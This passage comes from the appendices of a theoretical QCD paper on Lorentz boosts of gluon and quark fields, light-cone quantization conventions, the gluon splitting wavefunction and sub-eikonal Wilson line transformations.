The vector fields and the spinor fields constitute different representations of the Lorentz group. Their transformations under boost are obtained explicitly in this section.
The general Lorentz group representation is \[U(\omega_{\mu\nu})=\exp\left\{-\frac{i}{2}\omega_{\mu\nu}J^{\mu\nu}\right\}.\] (A.1) Here \(J^{\mu\nu}\) are the generators of the Lorentz group and \(\omega_{\mu\nu}\) are the corresponding tranformation parameters. It is antisymmetric tensor. The generators satisfy the commutation relations \[\left[J^{\mu\nu},J^{\rho\sigma}\right]=i(g^{\nu\rho}J^{\mu\sigma}-g^{\mu\rho}J ^{\nu\sigma}-g^{\nu\sigma}J^{\mu\rho}+g^{\mu\sigma}J^{\nu\rho}).\] (A.2) For the vector representation, the generators have the following explicit expression \[(J^{\mu\nu})^{\alpha}_{\ \beta}=i(g^{\mu\alpha}\delta^{\nu}_{\ \beta}-g^{\nu \alpha}\delta^{\mu}_{\ \beta}).\] (A.3) We are interested in the boost along z-axis, the transformation is \[U(\omega)=e^{-i\omega K^{3}}\] (A.4) with \[K^{3}=J^{03}=i\begin{pmatrix}0&0&0&1\\ 0&0&0&0\\ 0&0&0&0\\ 1&0&0&0\end{pmatrix}.\] (A.5) One obtains \[U(\omega)\equiv\Lambda=\begin{pmatrix}\cosh\omega&0&0&\sinh\omega\\ 0&1&0&0\\ 0&0&1&0\\ \sinh\omega&0&0&\cosh\omega\end{pmatrix}.\] (A.6) Under Lorentz boost, the gluon field transforms as \(\widetilde{A}^{\mu}(x)=U(\omega)A^{\mu}(\Lambda^{-1}x)\). The explicit expressions for each component are \[\begin{split}&\widetilde{A}^{+}=e^{\omega}A^{+}(e^{-\omega}x^{+},e ^{\omega}x^{-},\mathbf{x}_{\perp}),\\ &\widetilde{A}^{-}=e^{-\omega}A^{-}(e^{-\omega}x^{+},e^{\omega}x^{-}, \mathbf{x}_{\perp}),\\ &\widetilde{A}^{i}=A^{i}(e^{-\omega}x^{+},e^{\omega}x^{-}, \mathbf{x}_{\perp}).\end{split}\] (A.7) For the spinor representation \(U(\omega)=e^{-\frac{i}{2}\omega_{\mu\nu}S^{\mu\nu}}\) with the generators \(S^{\mu\nu}=\frac{i}{4}[\gamma^{\mu},\gamma^{\nu}]\), the boost operation has the explicit expression \[U(\omega)=e^{-i\omega K^{3}}\] (A.8) with \[K^{3}=S^{03}=\frac{i}{2}\gamma^{0}\gamma^{3}.\] (A.9) One can then obtain \[U(\omega)=\sinh\frac{\omega}{2}\gamma^{0}\gamma^{3}+\cosh\frac{\omega}{2}=e^{ \frac{\omega}{2}}\mathcal{P}_{G}+e^{-\frac{\omega}{2}}\mathcal{P}_{B}\] (A.10) It is interesting to note that the good component \(\psi_{G}=\mathcal{P}_{G}\psi\) and the bad component \(\psi_{B}=\mathcal{P}_{B}\psi\) transform differently under Lorentz boost. \[\begin{split}&\widetilde{\psi}_{G}=e^{\omega/2}\psi_{G}(e^{- \omega}x^{+},e^{\omega}x^{-},\mathbf{x}_{\perp}),\\ &\widetilde{\psi}_{B}=e^{-\omega/2}\psi_{B}(e^{-\omega}x^{+},e^{ \omega}x^{-},\mathbf{x}_{\perp}).\end{split}\] (A.11) Using the above transformations, one can also compute the transformations of field strength tensor under Lorentz boost. 
For example, for \(F^{+-}=\partial_{-}A^{-}-\partial_{+}A^{+}+ig[A^{+},A^{-}]\), one obtains \[\begin{split}\widetilde{F}^{+-}=&\partial_{-}e^{- \omega}A^{-}(e^{-\omega}x^{+},e^{\omega}x^{-},\mathbf{x}_{\perp})-\partial_{+} e^{\omega}A^{+}(e^{-\omega}x^{+},e^{\omega}x^{-},\mathbf{x}_{\perp})\\ &+ig\Big{[}A^{+}(e^{-\omega}x^{+},e^{\omega}x^{-},\mathbf{x}_{ \perp}),A^{-}(e^{-\omega}x^{+},e^{\omega}x^{-},\mathbf{x}_{\perp})\Big{]}\\ =&\tilde{\partial}_{-}A^{-}(\tilde{x}^{+},\tilde{x}^{ -},\mathbf{x}_{\perp})-\tilde{\partial}_{+}A^{+}(\tilde{x}^{+},\tilde{x}^{-}, \mathbf{x}_{\perp})+ig[A^{+}(\tilde{x}^{+},\tilde{x}^{-},\mathbf{x}_{\perp}),A ^{-}(\tilde{x}^{+},\tilde{x}^{-},\mathbf{x}_{\perp})]\\ =& F^{+-}(\tilde{x}^{+},\tilde{x}^{-},\mathbf{x}_{ \perp})\end{split}\] (A.12) Similarly, one obtains \[\begin{split}&\widetilde{F}^{+-}=F^{+-}(\tilde{x}^{+},\tilde{x}^{ -},\mathbf{x}_{\perp}),\\ &\widetilde{F}^{+i}=e^{\omega}F^{+i}(\tilde{x}^{+},\tilde{x}^{-}, \mathbf{x}_{\perp}),\\ &\widetilde{F}^{-i}=e^{-\omega}F^{-i}(\tilde{x}^{+},\tilde{x}^{ -},\mathbf{x}_{\perp}),\\ &\widetilde{F}^{ij}=F^{ij}(\tilde{x}^{+},\tilde{x}^{-},\mathbf{ x}_{\perp}).\end{split}\] (A.13) Convention for Light-Cone Quantization The mode expansions for the dynamical fields expressed in terms of the corresponding creation and annihilation operators are \[\begin{split} A^{\mu}_{a}(x)&=\int_{0}^{\infty}\frac{ dp^{+}}{2p^{+}(2\pi)}\int\frac{d^{2}\mathbf{p}}{(2\pi)^{2}}\sum_{\lambda}\left[e^{- ipx}\hat{a}_{a,\lambda}(p^{+},\mathbf{p})\varepsilon^{\mu}_{\lambda}(p^{+}, \mathbf{p})+e^{ipx}\hat{a}^{\dagger}_{a,\lambda}(p^{+},\mathbf{p})\varepsilon ^{*\mu}_{\lambda}(p^{+},\mathbf{p})\right],\\ \Psi_{i}(x)&=\int_{0}^{\infty}\frac{dk^{+}}{2k^{+}(2 \pi)}\int\frac{d^{2}\mathbf{k}}{(2\pi)^{2}}\sum_{\sigma}\left[e^{-ikx}\hat{b}_{ i,\sigma}(k^{+},\mathbf{k})u_{\sigma}(k^{+},\mathbf{k})+e^{+ikx}\hat{d}^{ \dagger}_{i,\sigma}(k^{+},\mathbf{k})v_{\sigma}(k^{+},\mathbf{k})\right],\end{split} \tag{113}\] with the commuation relations being \[\begin{split}\left[\hat{a}_{\lambda_{1},c_{1}}(p_{1}^{+}, \mathbf{p}_{1}),\hat{a}^{\dagger}_{\lambda_{2},c_{2}}(p_{2}^{+},\mathbf{p}_{2 })\right]&=(2p_{1}^{+})(2\pi)^{3}\delta(p_{1}^{+}-p_{2}^{+}) \delta^{(2)}(\mathbf{p}_{1}-\mathbf{p}_{2})\delta_{\lambda_{1}\lambda_{2}} \delta_{c_{1}c_{2}}\,,\\ \left\{\hat{b}_{\sigma_{1},i_{1}}(k_{1}^{+},\mathbf{k}_{1}),\hat{ b}^{\dagger}_{i_{2},\alpha_{2}}(k_{2}^{+},\mathbf{k}_{2})\right\}& =(2k_{1}^{+})(2\pi)^{3}\delta(k_{1}^{+}-k_{2}^{+})\delta^{(2)}( \mathbf{k}_{1}-\mathbf{k}_{2})\delta_{\sigma_{1}\sigma_{2}}\delta_{i_{1}i_{2}} \,,\\ \left\{\hat{d}_{\sigma_{1},i_{1}}(k_{1}^{+},\mathbf{k}_{1}),\hat{ d}^{\dagger}_{i_{2},\alpha_{2}}(k_{2}^{+},\mathbf{k}_{2})\right\}& =(2k_{1}^{+})(2\pi)^{3}\delta(k_{1}^{+}-k_{2}^{+})\delta^{(2)}( \mathbf{k}_{1}-\mathbf{k}_{2})\delta_{\sigma_{1}\sigma_{2}}\delta_{i_{1}i_{2}} \,.\end{split} \tag{114}\] We will use the shorthand notations \[\int_{p^{+}}\equiv\int_{0}^{\infty}\frac{dp^{+}}{2p^{+}(2\pi)},\quad\int_{ \mathbf{p}}\equiv\int\frac{d^{2}\mathbf{p}}{(2\pi)^{2}},\quad\int_{\mathbf{x} }\equiv\int d^{2}\mathbf{x}. \tag{115}\] It should be noted that in the free field expansions given in eq. 
(113), \(A^{+}=0\) and \(A^{-}=-\frac{\partial_{i}}{\partial_{-}}A^{i}\) are implementd by the requirements on the polarization vector \[\varepsilon^{+}_{\lambda}(p^{+},\mathbf{p})=0,\qquad\varepsilon^{-}_{\lambda} (p^{+},\mathbf{p})=\frac{\mathbf{p}^{i}\varepsilon^{i}_{\lambda}(p^{+}, \mathbf{p})}{p^{+}} \tag{116}\] as the independent field components are \(A^{i}\). Here \(\varepsilon^{i}_{\lambda}=\frac{1}{\sqrt{2}}(1,i\lambda)\). Similarly, for the fermion fields, not all the components of the spinors are independent \[\begin{split} u_{B,\sigma}(k)&=\frac{\gamma^{+}}{2k ^{+}}(\mathbf{k}^{j}\gamma^{j}+m)u_{G,\sigma}(k),\\ v_{B,\sigma}(k)&=\frac{\gamma^{+}}{2k^{+}}(\mathbf{ k}^{j}\gamma^{j}-m)u_{G,\sigma}(k).\end{split} \tag{117}\] For the explicit expressions of the spinor \(u(k),v(k)\), we use the Kogut-Soper convention [26; 27] (see also [65]). \[\begin{split} u(k_{1},\frac{1}{2})&=\frac{1}{2^{1/4 }\sqrt{k_{1}^{+}}}\begin{pmatrix}\sqrt{2}k_{1}^{+}\\ k_{1}^{+}+ik_{1}^{y}\\ m\\ 0\end{pmatrix}\,,\qquad u(k_{1},-\frac{1}{2})=\frac{1}{2^{1/4}\sqrt{k_{1}^{+}}} \begin{pmatrix}0\\ m\\ -k_{1}^{x}+ik_{1}^{y}\\ \sqrt{2}k_{1}^{+}\end{pmatrix},\\ v(k_{2},\frac{1}{2})&=\frac{1}{2^{1/4}\sqrt{k_{2}^{+}}} \begin{pmatrix}0\\ -m\\ -k_{2}^{x}+ik_{2}^{y}\\ \sqrt{2}k_{2}^{+}\end{pmatrix}\,,\qquad v(k_{2},-\frac{1}{2})=\frac{1}{2^{1/4 }\sqrt{k_{2}^{+}}}\begin{pmatrix}\sqrt{2}k_{2}^{+}\\ k_{2}^{x}+ik_{2}^{y}\\ -m\\ 0\end{pmatrix}\,.\end{split} \tag{118}\] In addition, the gamma matrices are taken in the chiral representation \[\gamma^{0}=\begin{pmatrix}0&1\\ 1&0\end{pmatrix}\,,\qquad\gamma^{i}=\begin{pmatrix}0&-\sigma^{i}\\ \sigma^{i}&0\end{pmatrix} \tag{104}\] Here \(\sigma^{i}\) are Pauli matrices and \(\gamma^{5}=i\gamma^{0}\gamma^{1}\gamma^{2}\gamma^{3}\). For any matrix in spinor space, it can be decomposed as \[M=AI+B_{\mu}\gamma^{\mu}+C_{\mu\nu}\sigma^{\mu\nu}+D_{\mu}\gamma^{\mu}\gamma^{5 }+E\gamma^{5} \tag{105}\] with the coefficients being \[A=\frac{1}{4}\text{Tr}[M],\quad B^{\mu}=\frac{1}{4}\text{Tr}[M\gamma^{\mu}], \quad C^{\mu\nu}=\frac{1}{8}\text{Tr}[M\sigma^{\mu\nu}],\quad D^{\mu}=-\frac{ 1}{4}\text{Tr}[M\gamma^{\mu}\gamma^{5}],\quad E=\frac{1}{4}\text{Tr}[M\gamma^{ 5}]. \tag{106}\] By explicit matrix algebra, one can verify the following identities that have been used in the main content of the paper. \[\left[\gamma_{i}u_{G,\sigma}(p^{+})\bar{u}_{G,\sigma^{\prime}}(p^{+})\gamma_{ i}\right]=p^{+}\delta_{\sigma\sigma^{\prime}}[\gamma^{-}+2\sigma\gamma^{-} \gamma^{5}]. \tag{107}\] \[\left[\gamma_{i^{\prime}}\varepsilon_{\lambda^{\prime}}^{i^{\prime}*}u_{G, \sigma}(k^{+})\bar{u}_{G,\sigma}(k^{+})\varepsilon_{\lambda}^{i}\gamma_{i} \right]=k^{+}\delta_{\lambda\lambda^{\prime}}[\gamma^{-}+\lambda\gamma^{-} \gamma^{5}]. \tag{108}\] To characterize gluon radiation, either before or after scattering with the shockwave, one needs the light-cone wavefunction for gluon splitting. This is textbook knowledge, we reproduce the result in this appendix for reference. The gluon splitting wave function from initial state has opposite sign compared to that from final state. We calculate the initial state gluon splitting. Figure 7: Gluon splitting vertex. 
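The first of the two spinor identities quoted above can indeed be confirmed by explicit matrix algebra. The SymPy sketch below is an added illustration, assuming the Kogut-Soper conventions \(\gamma^{\pm}=(\gamma^{0}\pm\gamma^{3})/\sqrt{2}\) and the good-component projector \(\mathcal{P}_{G}=\frac{1}{2}\gamma^{-}\gamma^{+}=\frac{1}{2}(1+\gamma^{0}\gamma^{3})\), under which \(u_{G,\sigma}(p^{+})\) has only its first (\(\sigma=+\tfrac{1}{2}\)) or fourth (\(\sigma=-\tfrac{1}{2}\)) component nonzero; it checks \(\gamma_{i}u_{G,\sigma}\bar{u}_{G,\sigma^{\prime}}\gamma_{i}=p^{+}\delta_{\sigma\sigma^{\prime}}[\gamma^{-}+2\sigma\gamma^{-}\gamma^{5}]\) for all spin combinations.

```python
import sympy as sp

# Illustrative check of the spinor identity, not code from the paper.
I2, Z2 = sp.eye(2), sp.zeros(2)
s1 = sp.Matrix([[0, 1], [1, 0]])
s2 = sp.Matrix([[0, -sp.I], [sp.I, 0]])
s3 = sp.Matrix([[1, 0], [0, -1]])

def block(A, B, C, D):
    return sp.Matrix(sp.BlockMatrix([[A, B], [C, D]]))

# Chiral-representation gamma matrices as in the text, and gamma^5
g = [block(Z2, I2, I2, Z2)] + [block(Z2, -s, s, Z2) for s in (s1, s2, s3)]
g5 = sp.I * g[0] * g[1] * g[2] * g[3]

# Assumed light-cone convention: gamma^- = (gamma^0 - gamma^3)/sqrt(2)
gminus = (g[0] - g[3]) / sp.sqrt(2)

# Good components of the Kogut-Soper spinors: P_G = (1 + gamma^0 gamma^3)/2 keeps
# only the first or fourth entry, of size 2^{1/4} sqrt(p^+), independent of k_perp and m
p = sp.symbols('p_plus', positive=True)
c = sp.root(2, 4) * sp.sqrt(p)
uG = {sp.Rational(1, 2): sp.Matrix([c, 0, 0, 0]),
      -sp.Rational(1, 2): sp.Matrix([0, 0, 0, c])}

for sig, u in uG.items():
    for sigp, up in uG.items():
        # gamma_i ... gamma_i with lowered indices (i = 1, 2) equals gamma^i ... gamma^i
        lhs = sum((g[i] * u * (up.H * g[0]) * g[i] for i in (1, 2)), sp.zeros(4))
        rhs = p * (1 if sig == sigp else 0) * (gminus + 2 * sig * gminus * g5)
        assert (lhs - rhs).applyfunc(sp.simplify) == sp.zeros(4)

print("gamma_i u_G ubar_G gamma_i = p^+ delta [gamma^- + 2 sigma gamma^- gamma^5] verified")
```

The initial-state gluon splitting wavefunction announced above is quoted next.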
\[\Psi^{g\to gg}(k_{1}^{+},{\bf y}_{1},c_{1},\lambda_{1};k_{2}^{+},{ \bf y}_{2},c_{2},\lambda_{2},k_{3}^{+},{\bf k}_{3},c_{3},\lambda_{3})\] \[= \frac{1}{k_{1}^{-}-k_{2}^{-}-k_{3}^{-}+i\epsilon}\langle 0|\hat{a}_{ c_{3},\lambda_{3}}(k_{3}^{+},{\bf k}_{3})\hat{a}_{ c_{2},\lambda_{2}}(k_{2}^{+},{\bf k}_{2})V_{ggg}\hat{a}_{c_{1},\lambda_{1}}^{ \dagger}(k_{1}^{+},{\bf k}_{1})|0\rangle\] \[= -(2\pi)^{3}\delta(k_{1}^{+}-k_{2}^{+}-k_{3}^{+})\delta({\bf k}_{1 }-{\bf k}_{2}-{\bf k}_{3})gf^{c_{1}c_{2}c_{3}}\left(\frac{{\bf k}_{1}^{2}}{2k_ {1}^{+}}-\frac{{\bf k}_{2}^{2}}{2zk_{1}^{+}}-\frac{({\bf k}_{1}-{\bf k}_{2})^{2 }}{2(1-z)k_{1}^{+}}\right)^{-1}\] \[\times\left[\delta_{\lambda_{2},-\lambda_{3}}i\varepsilon_{ \lambda_{1}}^{j}(2z{\bf k}_{1}-2{\bf k}_{2})^{j}+\delta_{\lambda_{1}\lambda_{2 }}i\varepsilon_{\lambda_{3}}^{j*}\frac{(-2z{\bf k}_{1}+2{\bf k}_{2})^{j}}{1-z} -\delta_{\lambda_{1}\lambda_{3}}i\varepsilon_{\lambda_{2}}^{j*}\frac{(-2{\bf k }_{2}+2z{\bf k}_{1})^{j}}{z}\right]\] \[= -gf^{c_{1}c_{2}c_{3}}(2\pi)^{3}2k_{1}^{+}\delta(k_{1}^{+}-k_{2}^{ +}-k_{3}^{+})\delta({\bf k}_{1}-{\bf k}_{2}-{\bf k}_{3})\] \[\times\left[z(1-z)\delta_{\lambda_{2},-\lambda_{3}}i\varepsilon_{ \lambda_{1}}^{j}-z\delta_{\lambda_{1}\lambda_{2}}i\varepsilon_{\lambda_{3}}^{j* }-(1-z)\delta_{\lambda_{1}\lambda_{3}}i\varepsilon_{\lambda_{2}}^{j*}\right] \frac{2({\bf k}_{2}-z{\bf k}_{1})^{j}}{({\bf k}_{2}-z{\bf k}_{1})^{2}}\] The three-gluon vertex \(V_{ggg}\) from eq. (9) has been substituted in the second equality. The delta function enforces \(k_{2}^{+}=zk_{1}^{+}\) and \(k_{3}^{+}=(1-z)k_{1}^{+}\) and \({\bf k}_{3}={\bf k}_{1}-{\bf k}_{2}\). It is more useful to have an expression in transverse coordinate space \[\Psi^{g\to gg}(k_{1}^{+},{\bf y}_{1},c_{1},\lambda_{1};k_{2}^{+},{ \bf y}_{2},c_{2},\lambda_{2},k_{3}^{+},{\bf y}_{3},c_{3},\lambda_{3})\] \[= \int_{{\bf k}_{1},{\bf k}_{2},{\bf k}_{3}}e^{-i{\bf k}_{1}\cdot{ \bf y}_{1}}e^{i{\bf k}_{2}\cdot{\bf y}_{2}}e^{i{\bf k}_{3}\cdot{\bf y}_{3}}\ \Psi^{g\to gg}(k_{1}^{+},{\bf k}_{1},c_{1},\lambda_{1};k_{2}^{+},{\bf k}_{2},c_ {2},\lambda_{2},k_{3}^{+},{\bf k}_{3},c_{3},\lambda_{3})\] \[= -gf^{c_{1}c_{2}c_{3}}(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-k_{2}^{+}- k_{3}^{+})\Big{[}z(1-z)\delta_{\lambda_{2},-\lambda_{3}}i\varepsilon_{\lambda_{1}}^{ j}-z\delta_{\lambda_{1}\lambda_{2}}i\varepsilon_{\lambda_{3}}^{j*}-(1-z) \delta_{\lambda_{1}\lambda_{3}}i\varepsilon_{\lambda_{2}}^{j*}\Big{]}\] \[\times\int_{{\bf k}_{1},{\bf k}_{2}}e^{-i{\bf k}_{1}\cdot({\bf y} _{1}-{\bf y}_{3})}e^{i{\bf k}_{2}\cdot({\bf y}_{2}-{\bf y}_{3})}\frac{2({\bf k }_{2}-z{\bf k}_{1})^{j}}{({\bf k}_{2}-z{\bf k}_{1})^{2}}\] \[= -gf^{c_{1}c_{2}c_{3}}(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-k_{2}^{+}- k_{3}^{+})\Big{[}z(1-z)\delta_{\lambda_{2},-\lambda_{3}}i\varepsilon_{\lambda_{1}}^{ j}-z\delta_{\lambda_{1}\lambda_{2}}i\varepsilon_{\lambda_{3}}^{j*}-(1-z) \delta_{\lambda_{1}\lambda_{3}}i\varepsilon_{\lambda_{2}}^{j*}\Big{]}\] \[\times\int_{{\bf k}_{3},{\bf k}_{2}}e^{i{\bf k}_{3}\cdot({\bf y} _{3}-{\bf y}_{1})}e^{i{\bf k}_{2}\cdot({\bf y}_{2}-{\bf y}_{1})}\frac{2[(1-z){ \bf k}_{2}-z{\bf k}_{3}]^{j}}{[(1-z){\bf k}_{2}-z{\bf k}_{3}]^{2}}.\] In the last equality, we have the expression from integrating out the momentum \({\bf k}_{1}\) rather than the momentum \({\bf k}_{3}\). 
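The transverse-coordinate dipole kernels, i.e. the factors \(({\bf y}_{2}-{\bf y}_{1})^{j}/|{\bf y}_{2}-{\bf y}_{1}|^{2}\) appearing in the soft limit below and throughout section 4, arise from the standard two-dimensional Fourier transform \(\int\frac{d^{2}{\bf k}}{(2\pi)^{2}}\,e^{i{\bf k}\cdot{\bf r}}\,\frac{{\bf k}^{j}}{{\bf k}^{2}}=\frac{i}{2\pi}\frac{{\bf r}^{j}}{|{\bf r}|^{2}}\). After the angular integration this reduces to the radial integral \(\int_{0}^{\infty}dk\,J_{1}(kr)=1/r\). The short Python sketch below is an added numerical illustration (not part of the paper): it regulates the radial integral with \(e^{-\epsilon k}\) and compares it with the closed form \(\frac{1}{r}\big(1-\epsilon/\sqrt{\epsilon^{2}+r^{2}}\big)\), which tends to \(1/r\) as \(\epsilon\to 0\).

```python
import numpy as np
from scipy.integrate import quad
from scipy.special import j1

# Illustrative check of the radial integral behind the dipole kernel:
# int_0^inf dk J_1(k r) = 1/r, regulated by exp(-eps*k) for numerical convergence.
for r in (0.5, 1.0, 2.0):
    for eps in (0.2, 0.1, 0.05):
        numeric, _ = quad(lambda k: np.exp(-eps * k) * j1(k * r), 0.0, np.inf, limit=500)
        closed = (1.0 - eps / np.hypot(eps, r)) / r
        assert abs(numeric - closed) < 1e-4
        print(f"r={r:3.1f}  eps={eps:4.2f}:  numeric={numeric:.6f}  closed form={closed:.6f}  1/r={1/r:.4f}")
```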
In the situation when the gluon radiated is soft \(z\to 0\), keeping terms up to linear order in \(z\), one obtains \[\Psi^{g\to gg}(k_{1}^{+},{\bf y}_{1},c_{1},\lambda_{1};k_{2}^{+},{ \bf y}_{2},c_{2},\lambda_{2},k_{3}^{+},{\bf y}_{3},c_{3},\lambda_{3})\Big{|}_{z \to 0}\] (B.14) \[= -gf^{c_{1}c_{2}c_{3}}(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-k_{2}^{+}-k_ {3}^{+})\delta({\bf y}_{3}-{\bf y}_{1})2\frac{i}{2\pi}\frac{({\bf y}_{2}-{\bf y}_ {1})^{j}}{|{\bf y}_{2}-{\bf y}_{1}|^{2}}\] \[\times\Big{[}-\delta_{\lambda_{1}\lambda_{3}}i\varepsilon_{\lambda_{2 }}^{j*}+z\Big{(}\delta_{\lambda_{2},-\lambda_{3}}i\varepsilon_{\lambda_{1}}^{j}- \delta_{\lambda_{1}\lambda_{2}}i\varepsilon_{\lambda_{3}}^{j*}\Big{)}\Big{]}.\] In the sub-eikonal order, we only kept terms that transfer polarization information to the softer gluons. Sub-eikonal Transformations Related to \(a^{-}\) Field From the interaction term at the eikonal order \[\begin{split} V_{0}=&\int dx^{-}d^{2}\mathbf{x}a^{-}_ {b}(x^{+},0,\mathbf{x})J^{+}_{b}(0,x^{-},\mathbf{x})\\ =&\int dx^{-}d^{2}\mathbf{x}a^{-}_{b}(x^{+},0,\mathbf{ x})\left(g\bar{\Psi}\gamma^{+}t^{b}\Psi-ig[A^{i},F^{+i}]^{b}\right)\end{split} \tag{108}\] and the definition of Wilson line operator \[\hat{W}(x^{+}_{f},x^{+}_{i})=\mathcal{P}\text{Exp}\left\{-i\int_{x^{+}_{i}}^{x ^{+}_{f}}dz^{+}V_{(0),\text{I}}(z^{+})\right\} \tag{109}\] If one ignores the transformation to interaction picture in \(V_{(0),\text{I}}(z^{+})=e^{iH_{0}z^{+}}V_{(0)}e^{-iH_{0}z^{+}}\), one obtains the well-known transformations for creation operators at the eikonal order. \[\begin{split}&\hat{W}(x^{+}_{f},x^{+}_{i})\hat{a}^{\dagger}_{h, \lambda}(p^{+},\mathbf{y})\hat{W}^{\dagger}(x^{+}_{f},x^{+}_{i})=\hat{a}^{ \dagger}_{c,\lambda}(p^{+},\mathbf{y})U^{ch}_{\mathbf{y}}(x^{+}_{f},x^{+}_{i}),\\ &\hat{W}(x^{+}_{f},x^{+}_{i})\hat{b}^{\dagger}_{i,\rho}(p^{+}, \mathbf{y})\hat{W}^{\dagger}(x^{+}_{f},x^{+}_{i})=\hat{b}^{\dagger}_{j,\rho}( p^{+},\mathbf{y})V^{ji}_{\mathbf{y}}(x^{+}_{f},x^{+}_{i}),\\ &\hat{W}(x^{+}_{f},x^{+}_{i})\hat{d}^{\dagger}_{i,\rho}(p^{+}, \mathbf{y})\hat{W}^{\dagger}(x^{+}_{f},x^{+}_{i})=V^{\dagger,ij}_{\mathbf{y}}( x^{+}_{f},x^{+}_{i})\hat{d}^{\dagger}_{j,\rho}(p^{+},\mathbf{y}).\end{split} \tag{110}\] Here the Wilson lines in the adjoint representation and the fundamental representation are \[U_{\mathbf{y}}(x^{+}_{f},x^{+}_{i})=\mathcal{P}\text{exp}\left\{-ig\int_{x^{+ }_{i}}^{x^{+}_{f}}dz^{+}a^{-}_{b}(z^{+},\mathbf{y})T^{b}\right\}. \tag{111}\] \[V_{\mathbf{y}}(x^{+}_{f},x^{+}_{i})=\mathcal{P}\text{exp}\left\{-ig\int_{x^{+ }_{i}}^{x^{+}_{f}}dz^{+}a^{-}_{b}(z^{+},\mathbf{y})t^{b}\right\}. \tag{112}\] Our goal is to obtain sub-eikonal corrections to the transformations in eq. (110). Recall that the free Hamiltonian \[H_{0}=\frac{1}{2}\int dx^{-}d^{2}\mathbf{x}\left[\bar{\Psi}\frac{m^{2}+\partial _{l}\partial^{l}}{i\partial_{-}}\gamma^{+}\Psi-A^{i}_{a}\partial_{l}\partial^ {l}A^{a}_{i}\right] \tag{113}\] can be expressed in terms of creation and annihilation operators as \[H_{0}=\int_{p^{+},\mathbf{p}}E_{p}\Big{[}\hat{b}^{\dagger}_{p,\sigma}\hat{b}_ {p,\sigma}-\hat{d}_{p,\sigma}\hat{d}^{\dagger}_{p,\sigma}+\hat{a}^{\dagger}_{ p,\lambda}\hat{a}_{p,\lambda}\Big{]} \tag{114}\] The light-cone energy is \(E_{p}=p^{-}=\frac{\mathbf{p}^{2}}{2p^{+}}\) in which we have ignored the mass of quarks and gluons. 
From this explicit expression, the transformation to the _interaction picture_ is calculated to be \[e^{iH_{0}z^{+}}\hat{a}^{\dagger}_{\lambda}(p^{+},\mathbf{x})e^{-iH_{0}z^{+}}=e ^{i\frac{-\partial_{\mathbf{p}}^{2}}{2p^{+}}z^{+}}\hat{a}^{\dagger}_{\lambda}( p^{+},\mathbf{x}) \tag{115}\] similar transformations hold for \(\hat{b}^{\dagger}_{p,\sigma}\) and \(\hat{d}^{\dagger}_{p,\sigma}\). The color current has the explicit expression \[\begin{split}&\hat{J}^{+}_{b}(\mathbf{x})=\int dx^{-}J^{+}_{b}(0,x^{-},\mathbf{x})\\ =& g\int_{k^{+}}\Big{[}\hat{b}^{\dagger}_{i,\sigma}(k^ {+},\mathbf{x})t^{b}_{ij}\hat{b}_{j,\sigma}(k^{+},\mathbf{x})+\hat{d}_{i, \sigma}(k^{+},\mathbf{x})t^{b}_{ij}\hat{d}^{\dagger}_{j,\sigma}(k^{+},\mathbf{ x})+\hat{a}^{\dagger}_{c,\lambda}(k^{+},\mathbf{x})T^{b}_{ce}\hat{a}_{e,\lambda}(k^{+}, \mathbf{x})\Big{]}\end{split} \tag{116}\] Using this expression, one can obtain the commutation relations \[[J_{b}^{+}(\mathbf{x}),\hat{a}_{h,\lambda}^{\dagger}(p^{+},\mathbf{y })]=g\hat{a}_{c,\lambda}^{\dagger}(p^{+},\mathbf{x})T_{ch}^{b}\delta(\mathbf{x}- \mathbf{y}), \tag{112}\] \[[J_{b}^{+}(\mathbf{x}),\hat{b}_{j,\rho}^{\dagger}(p^{+},\mathbf{y })]=g\hat{b}_{i,\rho}^{\dagger}(p^{+},\mathbf{x})t_{ij}^{b}\delta(\mathbf{x}- \mathbf{y}),\] \[[J_{b}^{+}(\mathbf{x}),\hat{d}_{i,\rho}^{\dagger}(p^{+},\mathbf{y })]=-gt_{ij}^{b}\hat{d}_{j,\rho}^{\dagger}(p^{+},\mathbf{x})\delta(\mathbf{x}- \mathbf{y}).\] The eikonal Wilson line operator eq. (110) contains sub-eikonal contribution due to the transformation to interaction picture \(V_{0,I}(z^{+})=e^{iH_{0}z^{+}}V_{(0)}e^{-iH_{0}z^{+}}\). We need to compute its action on creation operators up to sub-eikonal order \[\hat{W}(z_{N}^{+},z_{0}^{+})\hat{a}_{h,\lambda}^{\dagger}(p^{+}, \mathbf{y})\hat{W}^{\dagger}(z_{N}^{+},z_{0}^{+}) \tag{113}\] \[=\lim_{\begin{subarray}{c}\Delta x^{+}\to 0,\\ N\Delta x^{+}=z_{N}^{+}-z_{0}^{+}\end{subarray}}\prod_{j=0}^{N-1}\hat{W}(z_{j+ 1}^{+},z_{j}^{+})\hat{a}_{h,\lambda}^{\dagger}(p^{+},\mathbf{y})\hat{W}^{ \dagger}(z_{j+1}^{+},z_{j}^{+}).\] We use gluon creation operator as an example to demonstrate the derivations. In eq. (113), it is computed by dividing the time interval \([x_{f}^{+},x_{i}^{+}]\) into \(N\) pieces \(\Delta x^{+}=\frac{x_{f}^{+}-x_{i}^{+}}{N}\) and in the end taking \(N\to\infty\) and \(\Delta x^{+}\to 0\) limit with \(N\Delta x^{+}=x_{f}^{+}-x_{i}^{+}\) fixed. We use the denotations \(z_{0}^{+}=x_{i}^{+}\), \(z_{i}^{+}=z_{0}^{+}+i\Delta x^{+}\), \(z_{N}^{+}=x_{f}^{+}\). For the general expression, it is unclear how to get a closed form expression by taking the limits directly. However, one can obtain closed form expression up to sub-eikonal order. 
